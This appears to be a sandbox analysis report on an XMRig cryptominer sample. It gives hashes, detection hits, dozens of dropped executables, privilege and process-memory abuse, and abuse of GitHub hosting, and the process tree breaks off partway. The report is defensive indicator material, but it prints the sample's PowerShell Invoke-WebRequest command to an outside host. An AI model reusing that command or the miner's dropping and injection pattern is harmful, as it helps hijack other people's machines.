xmrig | 1b7c819b26747ab76044ac13a4c7f5dfe14eb0b867a0663866efe134152b26e7

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
26/05/2024, 17:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe
Size

2.6MB
MD5

183f63c31ab8eb5f96966cdd82458e70
SHA1

2312ced531865c3d0f62216d02d60a0a02cb9395
SHA256

1b7c819b26747ab76044ac13a4c7f5dfe14eb0b867a0663866efe134152b26e7
SHA512

9c091ab548ffc451db8185f03b5a60a4a470636b7b81e672c2333ffe10df0079508751c4c70e1cebeae77e1c71521862d27531c5183bca2f9d62ad1358e3e9c1
SSDEEP

49152:71G1NtyBwTI3ySZbrkXV1etEKLlWUTOfeiRA2R76zHrWax9hMkHC0IlnASEx/R2N:71ONtyBeSFkXV1etEKLlWUTOfeiRA2RT

Score

10^/10

xmrig execution miner upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 64 IoCs

miner

resource	yara_rule
behavioral2/memory/2316-0-0x00007FF658AD0000-0x00007FF658EC6000-memory.dmp	xmrig
behavioral2/files/0x00050000000232a4-6.dat	xmrig
behavioral2/files/0x0007000000023415-17.dat	xmrig
behavioral2/files/0x0008000000023412-20.dat	xmrig
behavioral2/files/0x0008000000023414-43.dat	xmrig
behavioral2/memory/4912-61-0x00007FF6AC450000-0x00007FF6AC846000-memory.dmp	xmrig
behavioral2/files/0x000700000002341c-72.dat	xmrig
behavioral2/files/0x0007000000023420-94.dat	xmrig
behavioral2/files/0x0007000000023421-105.dat	xmrig
behavioral2/files/0x0007000000023425-119.dat	xmrig
behavioral2/files/0x0007000000023428-134.dat	xmrig
behavioral2/files/0x000700000002342a-150.dat	xmrig
behavioral2/memory/744-804-0x00007FF6702C0000-0x00007FF6706B6000-memory.dmp	xmrig
behavioral2/memory/2676-811-0x00007FF6A8C60000-0x00007FF6A9056000-memory.dmp	xmrig
behavioral2/memory/1624-820-0x00007FF6CA730000-0x00007FF6CAB26000-memory.dmp	xmrig
behavioral2/memory/2328-835-0x00007FF732B50000-0x00007FF732F46000-memory.dmp	xmrig
behavioral2/memory/2432-842-0x00007FF742FD0000-0x00007FF7433C6000-memory.dmp	xmrig
behavioral2/memory/4800-840-0x00007FF6065C0000-0x00007FF6069B6000-memory.dmp	xmrig
behavioral2/memory/4788-826-0x00007FF619FD0000-0x00007FF61A3C6000-memory.dmp	xmrig
behavioral2/memory/1516-845-0x00007FF70DA50000-0x00007FF70DE46000-memory.dmp	xmrig
behavioral2/memory/2592-849-0x00007FF6C40A0000-0x00007FF6C4496000-memory.dmp	xmrig
behavioral2/memory/652-852-0x00007FF741430000-0x00007FF741826000-memory.dmp	xmrig
behavioral2/memory/1048-859-0x00007FF6A9160000-0x00007FF6A9556000-memory.dmp	xmrig
behavioral2/memory/1144-869-0x00007FF775F00000-0x00007FF7762F6000-memory.dmp	xmrig
behavioral2/memory/5016-872-0x00007FF7591B0000-0x00007FF7595A6000-memory.dmp	xmrig
behavioral2/memory/2184-874-0x00007FF773FA0000-0x00007FF774396000-memory.dmp	xmrig
behavioral2/memory/2080-877-0x00007FF703000000-0x00007FF7033F6000-memory.dmp	xmrig
behavioral2/memory/4684-881-0x00007FF75F390000-0x00007FF75F786000-memory.dmp	xmrig
behavioral2/memory/5000-889-0x00007FF789770000-0x00007FF789B66000-memory.dmp	xmrig
behavioral2/memory/2516-891-0x00007FF720F00000-0x00007FF7212F6000-memory.dmp	xmrig
behavioral2/memory/1544-893-0x00007FF6C01A0000-0x00007FF6C0596000-memory.dmp	xmrig
behavioral2/memory/3328-865-0x00007FF6A91B0000-0x00007FF6A95A6000-memory.dmp	xmrig
behavioral2/memory/4580-861-0x00007FF7DD770000-0x00007FF7DDB66000-memory.dmp	xmrig
behavioral2/files/0x0007000000023431-179.dat	xmrig
behavioral2/files/0x000700000002342f-177.dat	xmrig
behavioral2/files/0x0007000000023430-174.dat	xmrig
behavioral2/files/0x000700000002342e-170.dat	xmrig
behavioral2/files/0x000700000002342d-165.dat	xmrig
behavioral2/files/0x000700000002342c-157.dat	xmrig
behavioral2/files/0x000700000002342b-155.dat	xmrig
behavioral2/files/0x0007000000023429-145.dat	xmrig
behavioral2/files/0x0007000000023427-135.dat	xmrig
behavioral2/files/0x0007000000023426-130.dat	xmrig
behavioral2/files/0x0007000000023424-120.dat	xmrig
behavioral2/files/0x0007000000023423-115.dat	xmrig
behavioral2/files/0x0007000000023422-110.dat	xmrig
behavioral2/files/0x000700000002341f-95.dat	xmrig
behavioral2/files/0x000700000002341e-90.dat	xmrig
behavioral2/files/0x000700000002341d-84.dat	xmrig
behavioral2/files/0x000700000002341b-75.dat	xmrig
behavioral2/files/0x000700000002341a-73.dat	xmrig
behavioral2/files/0x0007000000023419-70.dat	xmrig
behavioral2/files/0x0007000000023418-68.dat	xmrig
behavioral2/files/0x0007000000023417-62.dat	xmrig
behavioral2/memory/4708-58-0x00007FF6232B0000-0x00007FF6236A6000-memory.dmp	xmrig
behavioral2/files/0x0007000000023416-48.dat	xmrig
behavioral2/files/0x0009000000023413-47.dat	xmrig
behavioral2/memory/1132-41-0x00007FF79FFE0000-0x00007FF7A03D6000-memory.dmp	xmrig
behavioral2/memory/4708-2311-0x00007FF6232B0000-0x00007FF6236A6000-memory.dmp	xmrig
behavioral2/memory/2184-2313-0x00007FF773FA0000-0x00007FF774396000-memory.dmp	xmrig
behavioral2/memory/1132-2314-0x00007FF79FFE0000-0x00007FF7A03D6000-memory.dmp	xmrig
behavioral2/memory/2080-2315-0x00007FF703000000-0x00007FF7033F6000-memory.dmp	xmrig
behavioral2/memory/4684-2316-0x00007FF75F390000-0x00007FF75F786000-memory.dmp	xmrig
behavioral2/memory/4708-2318-0x00007FF6232B0000-0x00007FF6236A6000-memory.dmp	xmrig

Blocklisted process makes network request 7 IoCs

flow	pid	Process
4	3144	powershell.exe
7	3144	powershell.exe
15	3144	powershell.exe
16	3144	powershell.exe
18	3144	powershell.exe
20	3144	powershell.exe
21	3144	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
3144	powershell.exe

Executes dropped EXE 64 IoCs

pid	Process
2184	BCfTdaI.exe
1132	mCsYycH.exe
2080	CgmBZkJ.exe
4684	zmTeDqF.exe
4708	PjuCVHE.exe
4912	dxtYcyz.exe
744	kCVYmIs.exe
5000	FThmAqn.exe
2676	QZKMyYk.exe
2516	rjDCHFc.exe
1624	APPjUkq.exe
1544	WvcIuUY.exe
4788	cujJRUE.exe
2328	FDEBrfR.exe
4800	chtCkBO.exe
2432	fNdukWq.exe
1516	KlwVmoW.exe
2592	RCjkzJf.exe
652	njIofWP.exe
1048	PRBItAp.exe
4580	GTeGwPd.exe
3328	WnXAFff.exe
1144	iuQjgaT.exe
5016	iQkIhMY.exe
964	ESSWbPL.exe
1736	qBMANUO.exe
4828	NQzumPb.exe
1564	JGyuVDy.exe
1152	KMcSPRC.exe
1796	DgSJSaS.exe
1556	CIKXNUz.exe
2648	gNOEFEh.exe
4092	VYNGHPc.exe
1916	IQfNsLc.exe
3464	aagHqgy.exe
2980	MXyMjKP.exe
5044	mRgSstU.exe
3812	gQxSeIx.exe
4040	DrwutEO.exe
2752	btSAfEt.exe
4504	gVmcoXX.exe
2480	lXyRrvj.exe
4312	jcWyaoL.exe
2932	bmPLtqC.exe
3356	KEudmQC.exe
1364	FDXomWk.exe
3108	dWwqtcl.exe
4524	BLICWth.exe
5032	GThlAQs.exe
3884	zANYdbY.exe
5108	wqdNaZS.exe
3304	JvRxCkB.exe
3216	eIoNVwL.exe
4216	AySvMsW.exe
1212	kMMyedp.exe
2268	AyfFcJG.exe
3332	dImddHs.exe
3280	EXRgBQe.exe
4420	ZKtiBMh.exe
1852	OLGZxLP.exe
808	UiVpwwv.exe
4048	pUfBEVo.exe
4996	XpMRezg.exe
2396	UOBKtae.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/2316-0-0x00007FF658AD0000-0x00007FF658EC6000-memory.dmp	upx
behavioral2/files/0x00050000000232a4-6.dat	upx
behavioral2/files/0x0007000000023415-17.dat	upx
behavioral2/files/0x0008000000023412-20.dat	upx
behavioral2/files/0x0008000000023414-43.dat	upx
behavioral2/memory/4912-61-0x00007FF6AC450000-0x00007FF6AC846000-memory.dmp	upx
behavioral2/files/0x000700000002341c-72.dat	upx
behavioral2/files/0x0007000000023420-94.dat	upx
behavioral2/files/0x0007000000023421-105.dat	upx
behavioral2/files/0x0007000000023425-119.dat	upx
behavioral2/files/0x0007000000023428-134.dat	upx
behavioral2/files/0x000700000002342a-150.dat	upx
behavioral2/memory/744-804-0x00007FF6702C0000-0x00007FF6706B6000-memory.dmp	upx
behavioral2/memory/2676-811-0x00007FF6A8C60000-0x00007FF6A9056000-memory.dmp	upx
behavioral2/memory/1624-820-0x00007FF6CA730000-0x00007FF6CAB26000-memory.dmp	upx
behavioral2/memory/2328-835-0x00007FF732B50000-0x00007FF732F46000-memory.dmp	upx
behavioral2/memory/2432-842-0x00007FF742FD0000-0x00007FF7433C6000-memory.dmp	upx
behavioral2/memory/4800-840-0x00007FF6065C0000-0x00007FF6069B6000-memory.dmp	upx
behavioral2/memory/4788-826-0x00007FF619FD0000-0x00007FF61A3C6000-memory.dmp	upx
behavioral2/memory/1516-845-0x00007FF70DA50000-0x00007FF70DE46000-memory.dmp	upx
behavioral2/memory/2592-849-0x00007FF6C40A0000-0x00007FF6C4496000-memory.dmp	upx
behavioral2/memory/652-852-0x00007FF741430000-0x00007FF741826000-memory.dmp	upx
behavioral2/memory/1048-859-0x00007FF6A9160000-0x00007FF6A9556000-memory.dmp	upx
behavioral2/memory/1144-869-0x00007FF775F00000-0x00007FF7762F6000-memory.dmp	upx
behavioral2/memory/5016-872-0x00007FF7591B0000-0x00007FF7595A6000-memory.dmp	upx
behavioral2/memory/2184-874-0x00007FF773FA0000-0x00007FF774396000-memory.dmp	upx
behavioral2/memory/2080-877-0x00007FF703000000-0x00007FF7033F6000-memory.dmp	upx
behavioral2/memory/4684-881-0x00007FF75F390000-0x00007FF75F786000-memory.dmp	upx
behavioral2/memory/5000-889-0x00007FF789770000-0x00007FF789B66000-memory.dmp	upx
behavioral2/memory/2516-891-0x00007FF720F00000-0x00007FF7212F6000-memory.dmp	upx
behavioral2/memory/1544-893-0x00007FF6C01A0000-0x00007FF6C0596000-memory.dmp	upx
behavioral2/memory/3328-865-0x00007FF6A91B0000-0x00007FF6A95A6000-memory.dmp	upx
behavioral2/memory/4580-861-0x00007FF7DD770000-0x00007FF7DDB66000-memory.dmp	upx
behavioral2/files/0x0007000000023431-179.dat	upx
behavioral2/files/0x000700000002342f-177.dat	upx
behavioral2/files/0x0007000000023430-174.dat	upx
behavioral2/files/0x000700000002342e-170.dat	upx
behavioral2/files/0x000700000002342d-165.dat	upx
behavioral2/files/0x000700000002342c-157.dat	upx
behavioral2/files/0x000700000002342b-155.dat	upx
behavioral2/files/0x0007000000023429-145.dat	upx
behavioral2/files/0x0007000000023427-135.dat	upx
behavioral2/files/0x0007000000023426-130.dat	upx
behavioral2/files/0x0007000000023424-120.dat	upx
behavioral2/files/0x0007000000023423-115.dat	upx
behavioral2/files/0x0007000000023422-110.dat	upx
behavioral2/files/0x000700000002341f-95.dat	upx
behavioral2/files/0x000700000002341e-90.dat	upx
behavioral2/files/0x000700000002341d-84.dat	upx
behavioral2/files/0x000700000002341b-75.dat	upx
behavioral2/files/0x000700000002341a-73.dat	upx
behavioral2/files/0x0007000000023419-70.dat	upx
behavioral2/files/0x0007000000023418-68.dat	upx
behavioral2/files/0x0007000000023417-62.dat	upx
behavioral2/memory/4708-58-0x00007FF6232B0000-0x00007FF6236A6000-memory.dmp	upx
behavioral2/files/0x0007000000023416-48.dat	upx
behavioral2/files/0x0009000000023413-47.dat	upx
behavioral2/memory/1132-41-0x00007FF79FFE0000-0x00007FF7A03D6000-memory.dmp	upx
behavioral2/memory/4708-2311-0x00007FF6232B0000-0x00007FF6236A6000-memory.dmp	upx
behavioral2/memory/2184-2313-0x00007FF773FA0000-0x00007FF774396000-memory.dmp	upx
behavioral2/memory/1132-2314-0x00007FF79FFE0000-0x00007FF7A03D6000-memory.dmp	upx
behavioral2/memory/2080-2315-0x00007FF703000000-0x00007FF7033F6000-memory.dmp	upx
behavioral2/memory/4684-2316-0x00007FF75F390000-0x00007FF75F786000-memory.dmp	upx
behavioral2/memory/4708-2318-0x00007FF6232B0000-0x00007FF6236A6000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
2	raw.githubusercontent.com
4	raw.githubusercontent.com

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\Windows\System\XzIpCAZ.exe	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe
File created	C:\Windows\System\qRgsJED.exe	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe
File created	C:\Windows\System\gDMMgfe.exe	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe
File created	C:\Windows\System\hecNJVV.exe	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe
File created	C:\Windows\System\GbtdLPT.exe	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe
File created	C:\Windows\System\fQBKBMw.exe	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe
File created	C:\Windows\System\ghMsmRq.exe	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe
File created	C:\Windows\System\jnrPJFa.exe	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe
File created	C:\Windows\System\ExvYPWy.exe	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe
File created	C:\Windows\System\WSIBeHg.exe	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe
File created	C:\Windows\System\MwlNYAW.exe	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe
File created	C:\Windows\System\ksCRqVo.exe	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe
File created	C:\Windows\System\MFJydjN.exe	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe
File created	C:\Windows\System\hKLBfUL.exe	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe
File created	C:\Windows\System\TERnJrY.exe	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe
File created	C:\Windows\System\eskzYUi.exe	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe
File created	C:\Windows\System\gzuHktG.exe	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe
File created	C:\Windows\System\hdotfbJ.exe	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe
File created	C:\Windows\System\EohRTtX.exe	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe
File created	C:\Windows\System\MkASPoT.exe	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe
File created	C:\Windows\System\RCCJXWJ.exe	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe
File created	C:\Windows\System\eWtQSkU.exe	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe
File created	C:\Windows\System\ZqFViND.exe	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe
File created	C:\Windows\System\nhdArqe.exe	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe
File created	C:\Windows\System\LMqodPt.exe	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe
File created	C:\Windows\System\tvbyMsx.exe	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe
File created	C:\Windows\System\JYEgAFb.exe	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe
File created	C:\Windows\System\vHLNYyg.exe	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe
File created	C:\Windows\System\QNDZFVn.exe	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe
File created	C:\Windows\System\gYsuiya.exe	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe
File created	C:\Windows\System\zSqwSrn.exe	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe
File created	C:\Windows\System\clbshLG.exe	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe
File created	C:\Windows\System\CjkyFWY.exe	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe
File created	C:\Windows\System\bSQCzdZ.exe	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe
File created	C:\Windows\System\pjLvaHG.exe	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe
File created	C:\Windows\System\mgUzMxt.exe	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe
File created	C:\Windows\System\bYFBblo.exe	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe
File created	C:\Windows\System\Resqppd.exe	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe
File created	C:\Windows\System\KJPmNKP.exe	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe
File created	C:\Windows\System\WniqImN.exe	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe
File created	C:\Windows\System\RCrNTBP.exe	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe
File created	C:\Windows\System\jZfaaoD.exe	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe
File created	C:\Windows\System\GyjzuCm.exe	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe
File created	C:\Windows\System\azLLVXD.exe	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe
File created	C:\Windows\System\worYMwb.exe	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe
File created	C:\Windows\System\zvyaulA.exe	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe
File created	C:\Windows\System\RCcLDzc.exe	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe
File created	C:\Windows\System\PnsBLqJ.exe	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe
File created	C:\Windows\System\NJqlWpd.exe	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe
File created	C:\Windows\System\MSTguSZ.exe	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe
File created	C:\Windows\System\xPpGOkn.exe	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe
File created	C:\Windows\System\zTouEJW.exe	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe
File created	C:\Windows\System\EyXLQqb.exe	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe
File created	C:\Windows\System\fuLueIx.exe	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe
File created	C:\Windows\System\MLEQMaK.exe	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe
File created	C:\Windows\System\irYlght.exe	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe
File created	C:\Windows\System\AfyXhmf.exe	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe
File created	C:\Windows\System\gPrGHkO.exe	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe
File created	C:\Windows\System\VsRIIHH.exe	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe
File created	C:\Windows\System\LJMqANw.exe	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe
File created	C:\Windows\System\KNeJNlS.exe	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe
File created	C:\Windows\System\sHInDjO.exe	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe
File created	C:\Windows\System\UbCBqMv.exe	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe
File created	C:\Windows\System\LjwDvMw.exe	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
3144	powershell.exe
3144	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeLockMemoryPrivilege	2316	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe
Token: SeLockMemoryPrivilege	2316	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe
Token: SeDebugPrivilege	3144	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2316 wrote to memory of 3144	2316	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe	86
PID 2316 wrote to memory of 3144	2316	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe	86
PID 2316 wrote to memory of 2184	2316	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe	87
PID 2316 wrote to memory of 2184	2316	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe	87
PID 2316 wrote to memory of 1132	2316	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe	88
PID 2316 wrote to memory of 1132	2316	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe	88
PID 2316 wrote to memory of 2080	2316	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe	89
PID 2316 wrote to memory of 2080	2316	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe	89
PID 2316 wrote to memory of 4684	2316	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe	90
PID 2316 wrote to memory of 4684	2316	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe	90
PID 2316 wrote to memory of 4708	2316	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe	91
PID 2316 wrote to memory of 4708	2316	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe	91
PID 2316 wrote to memory of 4912	2316	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe	92
PID 2316 wrote to memory of 4912	2316	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe	92
PID 2316 wrote to memory of 744	2316	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe	93
PID 2316 wrote to memory of 744	2316	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe	93
PID 2316 wrote to memory of 5000	2316	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe	94
PID 2316 wrote to memory of 5000	2316	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe	94
PID 2316 wrote to memory of 2676	2316	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe	95
PID 2316 wrote to memory of 2676	2316	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe	95
PID 2316 wrote to memory of 2516	2316	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe	96
PID 2316 wrote to memory of 2516	2316	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe	96
PID 2316 wrote to memory of 1624	2316	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe	97
PID 2316 wrote to memory of 1624	2316	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe	97
PID 2316 wrote to memory of 1544	2316	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe	98
PID 2316 wrote to memory of 1544	2316	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe	98
PID 2316 wrote to memory of 4788	2316	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe	99
PID 2316 wrote to memory of 4788	2316	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe	99
PID 2316 wrote to memory of 2328	2316	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe	100
PID 2316 wrote to memory of 2328	2316	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe	100
PID 2316 wrote to memory of 4800	2316	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe	101
PID 2316 wrote to memory of 4800	2316	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe	101
PID 2316 wrote to memory of 2432	2316	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe	102
PID 2316 wrote to memory of 2432	2316	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe	102
PID 2316 wrote to memory of 1516	2316	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe	103
PID 2316 wrote to memory of 1516	2316	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe	103
PID 2316 wrote to memory of 2592	2316	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe	104
PID 2316 wrote to memory of 2592	2316	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe	104
PID 2316 wrote to memory of 652	2316	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe	105
PID 2316 wrote to memory of 652	2316	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe	105
PID 2316 wrote to memory of 1048	2316	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe	106
PID 2316 wrote to memory of 1048	2316	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe	106
PID 2316 wrote to memory of 4580	2316	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe	107
PID 2316 wrote to memory of 4580	2316	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe	107
PID 2316 wrote to memory of 3328	2316	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe	108
PID 2316 wrote to memory of 3328	2316	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe	108
PID 2316 wrote to memory of 1144	2316	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe	109
PID 2316 wrote to memory of 1144	2316	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe	109
PID 2316 wrote to memory of 5016	2316	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe	110
PID 2316 wrote to memory of 5016	2316	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe	110
PID 2316 wrote to memory of 964	2316	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe	111
PID 2316 wrote to memory of 964	2316	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe	111
PID 2316 wrote to memory of 1736	2316	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe	112
PID 2316 wrote to memory of 1736	2316	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe	112
PID 2316 wrote to memory of 4828	2316	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe	113
PID 2316 wrote to memory of 4828	2316	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe	113
PID 2316 wrote to memory of 1564	2316	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe	114
PID 2316 wrote to memory of 1564	2316	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe	114
PID 2316 wrote to memory of 1152	2316	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe	115
PID 2316 wrote to memory of 1152	2316	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe	115
PID 2316 wrote to memory of 1796	2316	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe	116
PID 2316 wrote to memory of 1796	2316	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe	116
PID 2316 wrote to memory of 1556	2316	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe	117
PID 2316 wrote to memory of 1556	2316	183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe	117

C:\Users\Admin\AppData\Local\Temp\183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe
"C:\Users\Admin\AppData\Local\Temp\183f63c31ab8eb5f96966cdd82458e70_NeikiAnalytics.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2316
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3144
- C:\Windows\System\BCfTdaI.exe
  C:\Windows\System\BCfTdaI.exe
  2⤵
  - Executes dropped EXE
  PID:2184
- C:\Windows\System\mCsYycH.exe
  C:\Windows\System\mCsYycH.exe
  2⤵
  - Executes dropped EXE
  PID:1132
- C:\Windows\System\CgmBZkJ.exe
  C:\Windows\System\CgmBZkJ.exe
  2⤵
  - Executes dropped EXE
  PID:2080
- C:\Windows\System\zmTeDqF.exe
  C:\Windows\System\zmTeDqF.exe
  2⤵
  - Executes dropped EXE
  PID:4684
- C:\Windows\System\PjuCVHE.exe
  C:\Windows\System\PjuCVHE.exe
  2⤵
  - Executes dropped EXE
  PID:4708
- C:\Windows\System\dxtYcyz.exe
  C:\Windows\System\dxtYcyz.exe
  2⤵
  - Executes dropped EXE
  PID:4912
- C:\Windows\System\kCVYmIs.exe
  C:\Windows\System\kCVYmIs.exe
  2⤵
  - Executes dropped EXE
